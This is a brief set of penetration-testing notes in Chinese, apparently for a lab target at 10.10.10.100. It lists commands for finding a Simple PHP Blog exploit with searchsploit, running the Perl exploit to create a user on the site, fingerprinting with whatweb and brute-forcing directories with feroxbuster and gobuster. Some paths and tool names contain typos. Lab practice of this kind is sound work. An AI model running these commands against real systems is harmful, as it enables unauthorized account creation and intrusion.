找歷史框架漏洞
查詢相關框架漏洞
searchsploit Simple PHP Blog(cms名稱)
下載相關檔案
searchsploit Simple PHP Blog -m 1191.pl
檢視perl檔案
mousepad 1191.pl
下載模組
sudo apt install libswitch-perl
建立一個使用者
sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U l33t -P l33t
透過kali查詢cms架構和版本
whatweb
目錄遍歷
ferobuster
feroxbuster -u http://10.10.10.100/
gobuster
使用字典進行爆破
gobuster dir -u http://10.10.10.100:80 -w /user/share/dirbuster/worldlists/directory-list-2.3-medium.txt